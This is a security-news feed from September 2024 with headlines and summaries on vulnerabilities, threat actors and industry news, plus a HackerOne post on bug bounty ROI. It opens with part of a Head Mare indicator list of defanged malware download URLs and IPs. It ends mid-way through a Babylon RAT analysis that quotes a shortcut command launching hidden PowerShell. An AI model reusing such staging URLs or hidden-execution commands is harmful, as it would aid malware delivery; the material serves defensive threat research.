SHA-256 NA DC47D49D63737D12D92FBC74907CD3277739C6C4F00AAA7C7EB561E7342ED65E SHA-256 NA EDA18761F3F6822C13CD7BEAE5AF2ED77A9B4F1DC7A71DF6AB715E7949B8C78B SHA-256 NA 188.127.237[.]46 IP NA 45.87.246[.]169 IP NA 45.87.245[.]30 IP NA 185.80.91[.]107 IP NA 188.127.227[.]201 IP NA 5.252.176[.]47 IP NA 45.11.27[.]232 IP NA 188.127.237[.]46/winlog.exe URL NA 188.127.237[.]46/servicedll.exe URL NA 194.87.210[.]134/gringo/splhost.exe URL NA 194.87.210[.]134/gringo/srvhost.exe URL NA 94.131.113[.]79/splhost.exe URL NA 94.131.113[.]79/resolver.exe URL NA 45.156.21[.]178/dlldriver.exe URL NA 5.252.176[.]77/ngrok.exe URL NA 5.252.176[.]77/sherlock.ps1 URL NA 5.252.176[.]77/sysm.elf URL NA 5.252.176[.]77/servicedll.rar URL NA 5.252.176[.]77/reverse.exe URL NA 5.252.176[.]77/soft_knitting.exe URL NA 5.252.176[.]77/legislative_cousin.exe URL NA 5.252.176[.]77/2000×2000.php URL NA Sources: https://jamestown.org/program/developments-on-belarus-ukraine-border-prompt-roller-coaster-of-reactions-in-minsk/ https://kyivindependent.com/belarus-moved-third-of-its-army-to-ukraine-border-due-to-independence-day-celebration-mixup-lukashenko-claims/ https://www.atlanticcouncil.org/blogs/ukrainealert/putin-hopes-belarus-border-bluff-can-disrupt-ukraines-invasion-of-russia/ https://www.aljazeera.com/news/2024/8/18/belarus-says-ukraine-amassing-troops-at-border-amid-incursion-into-russia The post The Rise of Head Mare: A Geopolitical and Cybersecurity Analysis appeared first on Cyble.
by CYBLE
2024-09-05 14:25:16
Businesses still ready to invest in Gen AI, with risk management a top priorityAccording to a Salesforce study, 87% of C-suite executives say implementing AI technology is a top business priority, but 93% acknowledge barriers to adoption in their organizations.
by ZDNET Security
2024-09-05 14:02:03
Few Have Tried OpenAI’s Google Killer. Here’s What They Think.OpenAI’s search tool shows promise but lacks Google’s specialized functions and can suffer from hallucinations.
by ITPro Today
2024-09-05 14:00:00
The Role of Trust Anchors in Modern IT SecurityTo fully realize the benefits trust anchors provide, organizations need to implement processes and technologies that maintain the privacy and security of trust anchors and the personal data they contain.
by Dark Reading
2024-09-05 13:59:31
Russian military hackers linked to critical infrastructure attacksThe United States and its allies have linked a group of Russian hackers (tracked as Cadet Blizzard and Ember Bear) behind global critical infrastructure attacks to Unit 29155 of Russia''s Main Directorate of the General Staff of the Armed Forces (also known as GRU). [...]
by BleepingComputer
2024-09-05 13:53:18
MediaTek Chip Flaw Exposing Millions of Devices Gets Public ExploitA critical vulnerability (CVE-2024-20017) affecting MediaTek chipsets widely used in Wi-Fi 6 (802.11ax) devices has gained heightened attention following the publication of a proof-of-concept (PoC) exploit. The flaw, which received a CVSS score of 9.8, poses a severe security risk by allowing remote code execution (RCE) without any user interaction. The PoC was released by … The post MediaTek Chip Flaw Exposing Millions of Devices Gets Public Exploit appeared first on CyberInsider.
by Cyber Insider
2024-09-05 13:52:00
NCSC and allies call out Russia's Unit 29155 over cyber warfare
by ComputerWeekly
2024-09-05 13:15:02
Earth Lusca adds multiplatform malware KTLVdoor to its arsenalThe Chinese-speaking threat actor Earth Lusca used the new backdoor KTLVdoor in an attack against a trading company in China. Trend Micro Researchers spotted the Chinese-speaking threat actor Earth Lusca using a new multiplatform backdoor called KTLVdoor. The Earth Lusca group has been active since at least the first half of 2023, it primarily targeted […]
by Security Affairs
2024-09-05 13:15:00
Malware Attackers Using MacroPack to Deliver Havoc, Brute Ratel, and PhantomCoreThreat actors are likely employing a tool designated for red teaming exercises to serve malware, according to new findings from Cisco Talos. The program in question is a payload generation framework called MacroPack, which is used to generate Office documents, Visual Basic scripts, Windows shortcuts, and other formats for penetration testing and social engineering assessments. It was developed
by The Hacker News
2024-09-05 13:09:46
LiteSpeed Cache Flaw Exposes 6 Million WordPress Sites to Admin TakeoverA critical account takeover vulnerability in the LiteSpeed Cache plugin, affecting over 6 million WordPress sites, was patched yesterday with the release of version 6.5.0.1. The vulnerability allows unauthenticated users to take over logged-in accounts, including those with administrator privileges, by exploiting a debug log flaw. Security researcher Rafie Muhammad from Patchstack uncovered the issue … The post LiteSpeed Cache Flaw Exposes 6 Million WordPress Sites to Admin Takeover appeared first on CyberInsider.
by Cyber Insider
2024-09-05 13:00:27
Abusix Launches Guardian: Cutting-Edge Security Platform for Email and Network ProvidersBoston, MA, 5th September 2024, CyberNewsWire
by Hackread
2024-09-05 13:00:00
New report shows ongoing gender pay gap in cybersecurityThe gender gap in cybersecurity isn’t a new issue. The lack of women in cybersecurity and IT has been making headlines for years — even decades. While progress has been made, there is still significant work to do, especially regarding salary. The recent  ISC2 Cybersecurity Workforce Study highlighted numerous cybersecurity issues regarding women in the […] The post New report shows ongoing gender pay gap in cybersecurity appeared first on Security Intelligence.
by Security Intelligence
2024-09-05 12:58:24
LiteSpeed Cache bug exposes 6 million WordPress sites to takeover attacksYet, another critical severity vulnerability has been discovered in LiteSpeed Cache, a caching plugin for speeding up user browsing in over 6 million WordPress sites. [...]
by BleepingComputer
2024-09-05 12:53:05
Transatlantic Cable podcast episode 362 | Kaspersky official blogEpisode 362 looks at X’s recent ban, voice-over theft and Apple’s big App store conundrum.
by Kaspersky
2024-09-05 12:52:51
Serverless Is Trending Again in Modern Application DevelopmentAfter a decline in interest, serverless computing is resurging, positioning it as a key technology for modern cloud-native development.
by ITPro Today
2024-09-05 12:49:25
Musician charged with $10M streaming royalties fraud using AI and botsNorth Carolina musician Michael Smith was indicted for collecting over $10 million in royalty payments from Spotify, Amazon Music, Apple Music, and YouTube Music using AI-generated songs streamed by thousands of bots in a massive streaming fraud scheme. [...]
by BleepingComputer
2024-09-05 11:52:33
Healthcare and HIPAA: How to Avoid AI-Related Privacy PitfallsAs AI and ML revolutionize healthcare, concerns over data privacy and HIPAA compliance underscore the need for stringent security measures and ethical data handling practices.
by ITPro Today
2024-09-05 11:45:55
Fake OnlyFans Checker Tool Infects Hackers with Lummac Stealer MalwareOnlyFans account hackers are finding themselves on the receiving end of a nasty cyber surprise.
by Hackread
2024-09-05 11:44:43
Microclouds: The Next Big Thing in Cloud Computing or Just Another Edge Strategy?Microclouds combine cloud convenience with edge infrastructure, offering preconfigured server clusters for easy deployment anywhere, but their future impact on cloud computing remains uncertain.
by ITPro Today
2024-09-05 11:44:36
Peek into Monthly Vulnerabilities: August 2024August 2024 again saw an uptick in the number of vulnerability disclosures, with several commonly exploited Common Vulnerabilities and Exposures (CVEs) across several platforms. Risk levels may be high, particularly on an enterprise scale, but the number of exploits seen this month demonstrates that there are active attempts to prevent them. This was another month […] The post Peek into Monthly Vulnerabilities: August 2024 appeared first on ThreatMon Blog.
by ThreatMon
2024-09-05 11:38:13
Microchip Technology says its data was stolen amid alleged leaks onlineThe chipmaker said an unidentified attacker stole employee contact information and some encrypted and hashed passwords.
by Cybersecurity Dive
2024-09-05 11:30:06
Championing the Wins to Improve Wellbeing in the Cyber WorkplaceIt’s fair to say cyber security has a bad reputation. It’s portrayed as an industry full of stress, where sleepless nights are a prerequisite, and defenders have the weight of the world on their shoulders, while a world of adversaries work determinedly against them. As a frontline defender within the NHS, I can’t dispute some […] The post Championing the Wins to Improve Wellbeing in the Cyber Workplace appeared first on IT Security Guru.
by IT Security Guru
2024-09-05 11:00:00
Safeguarding Financial Data: Essential Cybersecurity Practices for Mobile BankingMobile app developers committed to upholding the highest security standards are faced with several considerations when developing and maintaining banking apps. Learn more. The post Safeguarding Financial Data: Essential Cybersecurity Practices for Mobile Banking appeared first on Zimperium.
by Zimperium
2024-09-05 10:40:31
White House launches cybersecurity hiring sprint to help fill 500,000 job openingsNational Cyber Director Harry Coker Jr. unveiled the program as part of an effort to fill a continued gap in cyber, technology and AI positions.
by Cybersecurity Dive
2024-09-05 10:33:00
New Cross-Platform Malware KTLVdoor Discovered in Attack on Chinese Trading FirmThe Chinese-speaking threat actor known as Earth Lusca has been observed using a new backdoor dubbed KTLVdoor as part of a cyber attack targeting an unnamed trading company based in China. The previously unreported malware is written in Golang, and thus is a cross-platform weapon capable of targeting both Microsoft Windows and Linux systems. ""KTLVdoor is a highly obfuscated malware that
by The Hacker News
2024-09-05 10:30:00
We Hunted Hidden Police Signals at the DNCUsing special software, WIRED investigated police surveillance at the DNC. We collected signals from nearly 300,000 devices, revealing vulnerabilities for both law enforcement and everyday citizens alike.
by WIRED Security News
2024-09-05 10:17:39
Veeam warns of critical RCE flaw in Backup & Replication softwareVeeam has released security updates for several of its products as part of a single September 2024 security bulletin that addresses 18 high and critical severity flaws in Veeam Backup & Replication, Service Provider Console, and One. [...]
by BleepingComputer
2024-09-05 10:10:00
Cisco Fixes Two Critical Flaws in Smart Licensing Utility to Prevent Remote AttacksCisco has released security updates for two critical security flaws impacting its Smart Licensing Utility that could allow unauthenticated, remote attackers to elevate their privileges or access sensitive information. A brief description of the two vulnerabilities is below - CVE-2024-20439 (CVSS score: 9.8) - The presence of an undocumented static user credential for an administrative account
by The Hacker News
2024-09-05 10:02:17
Is Russian group APT28 behind the cyber attack on the German air traffic control agency (DFS)?A cyber attack hit the German air traffic control agency (DFS) disrupting its operations, experts attribute it to Russia-linked group APT28. A cyber attack targeted the German Air Traffic Control Agency (DFS), as reported by Spiegel and European Truth. DFS, based in Langen near Frankfurt, confirmed that attackers breached its office connection but confirmed that […]
by Security Affairs
2024-09-05 09:00:24
The SEC’s 2023 final rules on cybersecurity disclosuresNew rules to inform investors about cybersecurity attacks on public companies.
by Sophos News
2024-09-05 08:33:20
Quishing, an insidious threat to electric car ownersQuishing is a type of phishing attack where crooks use QR codes to trick users into providing sensitive information or downloading malware. In recent years, the spread of electric cars has led to an increase in public charging stations. However, new cyber threats have emerged with this growth, including “quishing.” This term, a combination of […]
by Security Affairs
2024-09-05 08:14:57
Novel RAMBO Side-Channel Attack Leaks Data Through RAM Radio WavesResearchers from the Ben-Gurion University of the Negev have uncovered a method to leak sensitive data from air-gapped systems, introducing a novel attack technique known as RAMBO (RAM-based electromagnetic covert channel). The attack exploits the electromagnetic emissions generated by a computer''s RAM, allowing attackers to exfiltrate information like encryption keys, passwords, biometric data, and files. … The post Novel RAMBO Side-Channel Attack Leaks Data Through RAM Radio Waves appeared first on CyberInsider.
by Cyber Insider
2024-09-05 08:00:12
Tropic Trooper spies on government entities in the Middle EastKaspersky experts found a new variant of the China Chopper web shell from the Tropic Trooper group that imitates an Umbraco CMS module and targets a government entity in the Middle East.
by Securelist
2024-09-05 07:00:00
A global assessment of third-party connection tamperingCloudflare brings visibility to the practice of connection tampering as observed from our global network.
by Cloudflare
2024-09-05 07:00:00
Bringing insights into TCP resets and timeouts to Cloudflare RadarNew TCP resets and timeouts dataset on Cloudflare Radar surfaces connection tampering, scanning, DoS attacks, and more.
by Cloudflare
2024-09-05 06:52:00
Infosec spending to hit 3-year growth peak, reach $212B next year: GartnerThe continuation of annual double-digit growth rates, 15% next year, comes as organizations consolidate spending and reassess EPP and EDR needs.
by Cybersecurity Dive
2024-09-05 05:37:00
Canadian arrested by France after cooperating with US on Sky ECC cryptophone investigation
by ComputerWeekly
2024-09-05 05:15:20
Hacker trap: Fake OnlyFans tool backstabs cybercriminals, steals passwordsHackers are targeting other hackers with a fake OnlyFans tool that claims to help steal accounts but instead infects threat actors with the Lumma stealer information-stealing malware. [...]
by BleepingComputer
2024-09-05 04:01:00
Indian Army Propaganda Spread by 1.4K AI-Powered Social Media AccountsFor three years now, more than a thousand social media accounts have been reposting the same pro-India, anti-Pakistan content on Facebook and X.
by Dark Reading
2024-09-05 00:32:18
AI drives profit and revenue for MSPs and consultantsMultiple studies show that artificial intelligence (AI) is expected to increase revenues and profits for Managed Service Providers (MSPs). However, they also show that AI-enhanced security is struggling to keep up with AI-enhanced attacks.
by Barracuda
2024-09-05 00:00:00
Predator Spyware Infrastructure Returns Following Exposure and SanctionsIntellexa’s Predator spyware infrastructure re-emerges after sanctions. Learn how this mercenary spyware is evolving, targeting high-profile individuals, and what defensive measures can be taken.
by Recorded Future
2024-09-05 00:00:00
ZDI-24-1195: Malwarebytes Antimalware Link Following Local Privilege Escalation VulnerabilityThis vulnerability allows local attackers to escalate privileges on affected installations of Malwarebytes Antimalware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.0. The following CVEs are assigned: CVE-2024-6260.
by Zero Day Initiative Advisories
2024-09-05 00:00:00
ZDI-24-1194: Linux Kernel Plan 9 File System Race Condition Local Privilege Escalation VulnerabilityThis vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39463.
by Zero Day Initiative Advisories
2024-09-05 00:00:00
ZDI-24-1193: Delta Electronics DIAScreen DPA File Parsing Stack-based Buffer Overflow Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics DIAScreen. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-7502.
by Zero Day Initiative Advisories
2024-09-04 23:29:15
New Supply Chain Attack “Revival Hijack” Risks Massive PyPI TakeoversJFrog''s cybersecurity researchers have identified a new PyPI attack technique called ""Revival Hijack,"" which exploits package deletion policies. Over 22,000 packages are at risk, potentially impacting thousands of users. Stay informed!
by Hackread
2024-09-04 21:44:48
Simplify cybersecurity with a platform consolidation frameworkTo deal with today’s complex and constantly evolving threat landscape and an expanding attack surface, organizations have added a wide range of cybersecurity solutions as they try to improve their security posture and protect their networks, applications, and data.
by Barracuda
2024-09-04 21:34:14
White House Unveils Road Map to Fix BGPThe White House Office of the National Cyber Director released a plan outlining steps network operators and service providers need to take to secure BGP from abuse and configuration errors.
by Dark Reading
2024-09-04 21:22:00
North Korean Hackers Targets Job Seekers with Fake FreeConference AppNorth Korean threat actors have leveraged a fake Windows video conferencing application impersonating FreeConference.com to backdoor developer systems as part of an ongoing financially-driven campaign dubbed Contagious Interview. The new attack wave, spotted by Singaporean company Group-IB in mid-August 2024, is yet another indication that the activity is also leveraging native installers for
by The Hacker News
2024-09-04 20:18:54
'Revival Hijack'' on PyPI Disguises Malware With Legitimate File NamesAdversaries reusing abandoned package names sneak malware into organizations in a sort of software shell game.
by Dark Reading
2024-09-04 19:58:34
Cisco Warns of Severe Vulnerabilities in Licensing ToolCisco has issued a critical security advisory for its Smart Licensing Utility, highlighting two severe vulnerabilities that could allow remote attackers to gain control of systems or access sensitive data without authentication. The vulnerabilities, identified as CVE-2024-20439 and CVE-2024-20440, received a critical CVSS score of 9.8. Both flaws stem from improper credential handling and excessive … The post Cisco Warns of Severe Vulnerabilities in Licensing Tool appeared first on CyberInsider.
by Cyber Insider
2024-09-04 19:38:27
Yubico Discloses Unfixable Cryptographic Flaw on Some YubiKeysYubico has disclosed a security vulnerability affecting certain YubiKey and YubiHSM devices, which rely on Infineon''s cryptographic library. This flaw allows sophisticated attackers with physical access to potentially recover private keys used in cryptographic operations. While the vulnerability is significant, it affects only older firmware versions, and Yubico has since removed the flawed library from … The post Yubico Discloses Unfixable Cryptographic Flaw on Some YubiKeys appeared first on CyberInsider.
by Cyber Insider
2024-09-04 19:35:56
X is hiring staff for security and safety after two years of layoffsThe hiring effort comes after X, formerly known as Twitter, laid off 80% of its trust and safety staff since Musk''s takeover. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-09-04 19:06:00
Android Users Urged to Install Latest Security Updates to Fix Actively Exploited FlawGoogle has released its monthly security updates for the Android operating system to address a known security flaw that it said has come under active exploitation in the wild. The high-severity vulnerability, tracked as CVE-2024-32896 (CVSS score: 7.8), relates to a case of privilege escalation in the Android Framework component. According to the description of the bug in the NIST National
by The Hacker News
2024-09-04 18:43:25
LLM Security: Going Beyond FirewallsAs enterprises increasingly adopt large language models, security concerns are shifting from traditional LLM Firewalls to more advanced LLM Threat Detection and Response.
by ITPro Today
2024-09-04 18:38:16
Quantifying the Value of Bug Bounty Programs: ROI, ROM, or Both?Quantifying the Value of Bug Bounty Programs: ROI, ROM, or Both? HackerOne Wed, 09/04/2024 - 11:38 Body HackerOne customers consistently factor in cost savings when measuring the success of their security engagements, with 59% valuing the estimated savings of reputational or customer-related incidents and 54% valuing the financial savings estimated from avoiding risk. However, quantifying the ROI for security control testing can be challenging due to the intangible nature of cybersecurity benefits. How do you measure the value of preventing something from happening?Supplementing ROI With ROMTraditional ROI calculations often fall short in capturing the full value of security investments. Gaining traction as an alternative, and in most cases, complementary, assessment mechanism is Return on Mitigation (ROM), which compares the anticipated costs of a security breach with the costs of implementing mitigation strategies. It provides a more nuanced understanding of the qualitative and quantitative benefits of proactive security measures. ROM factors in various potential costs, including:Restoring compromised systemsLost revenue due to downtimeLegal and regulatory penaltiesDamage to public trust and reputationBy assessing the effectiveness of mitigation or prevention strategies in terms of potential financial consequences, ROM offers a practical framework for stakeholders to evaluate the tangible and intangible value of security investments. It also shifts the focus from immediate cost savings to long-term resilience, with a magnifying glass on risk management.“The bug bounty program is the highest ROI across all of our spend. It’s really hard to show ROI, but with bug bounty, I have a baseline. I can say, ‘This vulnerability was able to be found by someone outside the organization. Someone that was not authorized to access this system was able to access it.’ Even with vulnerabilities that are not within our program, bug bounty allows me to put a price tag on them. I can explain this business case and our stakeholders are able to prioritize bug bounty higher than other tools that also generate ROI.”— Eric Kieling, Head of Application Security, Booking.comROI and ROM CalculationsTo illustrate the practical benefits of human-powered security testing and calculations of ROI and ROM, consider a case study from the financial services sector. A major financial institution implemented a bug bounty program alongside its existing red teaming efforts. Over the course of a year, the program identified several critical vulnerabilities that had been overlooked by previous tests.ScenarioInitial security investment: The institution invested $200,000 in the bug bounty program and an additional $100,000 in red teaming exercises.Potential breach costs: A potential breach was estimated to cost the institution $5 million, including costs associated with restoring compromised systems, lost revenue, legal penalties, and reputational damage.Return on Investment (ROI)A simple ROI calculation looks at the return of $300,000 against a potential $5 million breach.Breach prevention: By identifying and mitigating vulnerabilities, the institution avoided a potential $5 million breach.Cost of testing: The total investment in proactive security testing was $300,000.Using Traditional ROI CalculationsTraditional ROI or cost-benefit analyses yield approximately $15.67 in ROI.If we look at ROM, we compare the cost of implementing security measures against the anticipated breach cost.In this scenario, the ROM indicates that for every dollar spent on mitigation, the organization potentially saves $16.67 in breach costs. For the sake of this case example, we kept these costs simple. However, it is important to remember that breach costs these days include much more than just a simple flat dollar amount. They also include potential ransom payments, compliance requirements, regulatory fines, legal fees, brand damage, and much more. Breaches in the financial services sector, for example, cost an average of $6.08 million.Real-World ROMAccording to the 7th Annual Hacker-Powered Security Report, the median price of a bug on the HackerOne platform is $500, up from $400 in 2022. The average bounty in the 90th percentile is up from $2,500 to $3,000. But here''s the dramatic reality: the cost of these vulnerabilities going unnoticed and being exploited in the wild is an overwhelming 1,600 times more than the cost of the bounty — $4.88M on average.“Since 2019, Zoom has worked with 900 hackers, of which 300 have submitted vulnerabilities that we have had to quickly move on. We’ve paid out over $7 million. It’s a substantial investment but the returns are worth it: we find world-class talent to find real-world solutions before it’s a real-world problem.”— Michael Adams, CISO, ZoomDeliver Strategic Value From Security Initiatives With HackerOneAt HackerOne, we’re not only the leader in high-quality, repeatable security engagements — we’re also the experts in helping partners quantify and qualify the value of those engagements for more robust security budgets and successful programs. To learn more about ROI and ROM and the best ways to express the value of proactive security to stakeholders with human-powered security, download the SANS White Paper: Human-Powered Security Testing. Excerpt Is ROI the right method to measure bug bounty value? Check out the cost-benefit analysis of ROI vs. ROM. Main Image
by HackerOne
2024-09-04 18:30:00
Researchers Find Over 22,000 Removed PyPI Packages at Risk of Revival HijackA new supply chain attack technique targeting the Python Package Index (PyPI) registry has been exploited in the wild in an attempt to infiltrate downstream organizations. It has been codenamed Revival Hijack by software supply chain security firm JFrog, which said the attack method could be used to hijack 22,000 existing PyPI packages and result in ""hundreds of thousands"" of malicious package
by The Hacker News
2024-09-04 17:32:07
Code Intelligence Appoints Dr. Eric Brüggemann as CEO | Blog | Code IntelligenceFormer BCG and Thinkproject Executive to Lead Code Intelligence Through Continued International Expansion Bonn, Germany — September 05, 2024 — Code Intelligence, the pioneer in AI-automated software testing, today announced the appointment of Dr. Eric Brüggemann as Chief Executive Officer (CEO), as the company continues to scale to meet growing international demand. Former CEO and Co-Founder Sergej Dechand will remain with the organization as Chief Evangelist.Dr. Brüggemann joined Code Intelligence as Managing Director and Chief Operating Officer (COO) last year, where he successfully led enterprise customer engagements for the company. During his tenure, he successfully laid the foundation for repeatable success and sustainable growth. Prior to Code Intelligence, he served as Chief of Staff at Thinkproject, leading the transformation from a heterogeneous product portfolio into a unified platform as well as expanding and further harmonizing the international footprint across more than 15 countries worldwide.
by Code Intelligence
2024-09-04 17:23:35
DDoS Attacks Hit France Over Telegram’s Pavel Durov ArrestHacktivists unite for the #FreeDurov campaign to launch a massive cyber campaign against France in response to Telegram…
by Hackread
2024-09-04 17:18:00
That massive Pixel security flaw reported last month has been patchedGoogle''s new update removes software intended only for cell phone store employees that could have been exploited by bad actors.
by ZDNET Security
2024-09-04 17:00:54
Open Source Tool Allows Voters to Verify Election ResultsThe ElectionGuard project allows anyone — voters, campaign staffers, and election officials — to cryptographically verify ballots, a promise which may bolster faith in election integrity.
by Dark Reading
2024-09-04 16:58:59
Quantum-resistant encryption and compatibility issues | Kaspersky official blogApplications and libraries supporting post-quantum cryptography in 2024
by Kaspersky
2024-09-04 16:57:40
FBI: North Korean Actors Readying Aggressive Cyberattack WaveSophisticated social engineering is expected to accompany threat campaigns that are highly targeted and aimed at stealing crypto and deploying malware.
by Dark Reading
2024-09-04 16:57:00
Zyxel Patches Critical OS Command Injection Flaw in Access Points and RoutersZyxel has released software updates to address a critical security flaw impacting certain access point (AP) and security router versions that could result in the execution of unauthorized commands. Tracked as CVE-2024-7261 (CVSS score: 9.8), the vulnerability has been described as a case of operating system (OS) command injection. ""The improper neutralization of special elements in the
by The Hacker News
2024-09-04 16:57:00
The New Effective Way to Prevent Account TakeoversAccount takeover attacks have emerged as one of the most persistent and damaging threats to cloud-based SaaS environments. Yet despite significant investments in traditional security measures, many organizations continue to struggle with preventing these attacks. A new report, ""Why Account Takeover Attacks Still Succeed, and Why the Browser is Your Secret Weapon in Stopping Them"" argues that the
by The Hacker News
2024-09-04 16:52:24
“Hello pervert” sextortion scam includes new threat of Pegasus—and a picture of your home"" Hello pervert"" sextortion mails keep adding new features to their email to increase credibility and urge victims to pay
by Malwarebytes Labs
2024-09-04 16:52:00
PyPI loophole puts thousands of packages at risk of compromise
by ComputerWeekly
2024-09-04 16:20:52
AI Innovation in the Spotlight at Fal.Con 2024Every year, the role of AI in cybersecurity grows more prominent. This is especially true in the security operations center (SOC), where AI-native detection and GenAI-fueled workflows are advancing cyber defense and shaping the end-to-end analyst experience. But while defenders are using AI to operate with greater speed and scale, adversaries are following suit, using […]
by CrowdStrike
2024-09-04 15:18:43
You have one minute to save your leaked AWS credentialsNew research suggests that cyber-thieves can discover and use leaked credentials in a matter of seconds.
by ThreatDown
2024-09-04 15:13:19
How to avoid election related scamsWith the elections at full throttle we are seeing several types of scams resurfacing and undoubtedly more will come
by Malwarebytes Labs
2024-09-04 15:10:59
Threat Actors Increasingly Exploit Deepfakes for Social EngineeringThe availability of deepfake technology has given threat actors a valuable tool for social engineering attacks, according to researchers at BlackBerry.
by KnowBe4
2024-09-04 14:58:25
[Security Masterminds Podcast] The Human Side of Cybersecurity: Bridging the Gap with Empathy and StrategyIn cybersecurity, technology often takes center stage. From the latest AI-driven defenses to sophisticated encryption techniques, it''s easy to overlook the most crucial element: the human factor.
by KnowBe4
2024-09-04 14:48:34
Rage Stealer Rebranded as Angry Stealer, Now Uses Telegram Bot for Data TheftBeware of “Angry Stealer,” a new malware targeting your online accounts. This rebranded version of Rage Stealer steals…
by Hackread
2024-09-04 14:47:35
OSCP is not the same anymoreA few days ago, Offsec announced a change in the OSCP certification, which will now be called OSCP+. OffSec will replace the current OSCP exam with an updated version that includes the following changes:Changes in the Active Directory portionRemoval of bonus points1. Changes in the Active Directory portionTo meet the changing cybersecurity landscape and prepare candidates for real-world challenges, they have updated the Active Directory portion of the exam. This change is based on the “Assumed Compromised Model,” where you will be provided authorized access to a domain or user. With this initial access to the AD domain, your goal will be the full domain compromise.What are the Bonus points:Bonus points were a way to drive engagement and adoption, but most learners did not require bonus points to pass the OSCP exam. Rather, the exercises required to earn bonus points better enabled learners to train and prepare for a successful OSCP exam experience2. Removal of bonus pointsBefore this change, OffSec allowed candidates to earn up to 10 bonus points in their exam. This meant that if you secured 10 bonus points before attempting the exam, you only needed 60 points to pass the OSCP exam.However, with the removal of bonus points, candidates will no longer receive this benefit and must secure all 70 points during the exam. This change aims to provide more consistency and fairness across all OffSec exams and certifications.When you take the OSCP exam, candidates will earn both the OSCP and OSCP+ certifications. However, the OSCP+ certificate will expire after 3 years of issuance, while the OSCP certificate will not expire and is valid for a lifetime.Candidates can renew their OSCP+ certification in the following ways:Pass a recertification exam within 6 months of the OSCP+ expiryPass any other OffSec certification exam: OSEP, OSWA, OSED, or OSEEParticipate in a CPE program (details to be announced in late 2024)For Existing OSCP holders:OffSec is offering existing OSCP holders the chance to take the new OSCP+ exam at a discounted price of $199 USD if purchased between 1st Nov 2024 to 31st Mar 2025.If you are an existing OSCP holder, taking the OSCP+ exam is not mandatory. The changes in the exam will not affect your existing OSCP certification, which remains valid for a lifetime. However, if you want to upgrade to the OSCP+ certification, you will need to take the recertification exam.Reference:Link to the OffSec Support PortalBuy Me A Coffee☕You can buy me a coffee here.https://buymeacoffee.com/ommaniyaThanks for ReadingOSCP is not the same anymore was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2024-09-04 14:13:00
Clearview AI Faces €30.5M Fine for Building Illegal Facial Recognition DatabaseThe Dutch Data Protection Authority (Dutch DPA) has imposed a fine of €30.5 million ($33.7 million) against facial recognition firm Clearview AI for violating the General Data Protection Regulation (GDPR) in the European Union (E.U.) by building an ""illegal database with billions of photos of faces,"" including those of Dutch citizens. ""Facial recognition is a highly intrusive technology that you
by The Hacker News
2024-09-04 14:00:54
Criminal IP Secures PCI DSS v4.0 Certification, Enhancing Payment Security with Top-Level ComplianceTorrance, United States / California, 4th September 2024, CyberNewsWire
by Hackread
2024-09-04 14:00:00
How CISOs Can Effectively Communicate Cyber-RiskA proximity resilience graph offers a more accurate representation of risk than heat maps and risk registers, and allows CISOs to tell a complex story in a single visualization.
by Dark Reading
2024-09-04 13:59:19
The Intricate Babylon RAT Campaign Targets Malaysian Politicians, GovernmentKey takeaways Cyble Research and Intelligence Lab (CRIL) has identified a highly targeted cyber-attack aimed at political figures and government officials, in Malaysia. The attack showcases the advanced tactics employed by Threat Actor (TA) in targeting high-profile individuals and institutions. The campaign active since July, has employed at least three distinct malicious ISO files specifically designed to compromise Malaysian entities. The malicious ISO files contain multiple components, including a shortcut (LNK) file, a hidden PowerShell script, a malicious executable, and a decoy PDF file. The campaign delivers Babylon RAT as a final payload. Babylon RAT, an open-source Remote Access Trojan (RAT), provides unauthorized access to the victim’s machine. It allows the TA to execute commands remotely, control the system, and exfiltrate sensitive data. Intelligence from Cyble Vision’s platform indicates that the TA behind this campaign has previously targeted Malaysian entities using Quasar RAT, another open-source RAT. Overview Cyble Research and Intelligence Lab (CRIL) has recently discovered a campaign involving malicious ISO files, targeting political figures and government officials within Malaysia. The initial infection vector for this campaign is unclear. The ISO file is crafted with deceptive elements to trick users into thinking they are interacting with legitimate files. It contains a visible shortcut file that mimics a PDF document, alongside a hidden malicious executable, a lure PDF document, and a concealed PowerShell script. Upon opening the shortcut file, the PowerShell script executes sneakily in the background, which then launches the decoy PDF and copies the malicious executable to the %appdata% directory. The script also creates a registry entry to ensure the executable runs on system startup and then executes the malicious file. The final payload in this campaign is Babylon RAT, an open-source Remote Access Trojan (RAT) designed for comprehensive surveillance and data theft. Babylon RAT offers a wide range of malicious functionalities, including capturing keystrokes, clipboard monitoring, password extraction, and remote command execution. It enables TAs to covertly monitor user activity and steal sensitive information. The RAT maintains persistence on infected systems through registry modifications, ensuring it can survive reboots and continue operations. Additionally, Babylon RAT includes a sophisticated control panel, allowing TAs to efficiently manage compromised systems, execute commands remotely, and access stolen data, making it a powerful tool for cyber espionage and data exfiltration. The below Figure shows the Infection chain Figure 1 - infection chain Technical Analysis This campaign has been active since last July, with three distinct malicious ISO files observed targeting Malaysian entities. The use of three different lure documents suggests an attempt to reach a broader audience. At the end of July, we observed two ISO files: one containing a lure document addressing political concerns in Malaysia, suggesting the campaign targets politically engaged individuals in the country. The other ISO file included a lure related to Majlis Amanah Rakyat (MARA), indicating that the TA is targeting Malaysian government officials. The below figure shows the lure documents observed in July. Figure 2 - Lure Document Figure 3 - Lure Document At the end of August, we identified another malicious ISO file with a lure document related to the MyKHAS system, indicating that the TA is targeting Malaysian government officials who use the MyKHAS platform as shown below. Figure 4 - Lure Document In all three ISO files, a similar approach is used: each contains a visible shortcut file that resembles a PDF document, as well as a hidden malicious executable, a lure PDF document, and a concealed PowerShell script as shown in the below figure. Figure 5 - inside iso file once mounted For analysis, we are examining the ISO sample identified in August named “PANDUAN_PENGGUNA_MyKHAS.iso” with the sha256 value “d9f0268cbaa1ae45dfa755adab9dda2d8bdff3c8bf8a00d23bbc6894c28e225f”. When the user opens the [.]lnk file, it silently executes the hidden PowerShell script in the background. This execution is triggered by a command line embedded in the shortcut file, as mentioned below. “%windir%/System32/cmd.exe /c powershell -WindowStyle hidden -nologo 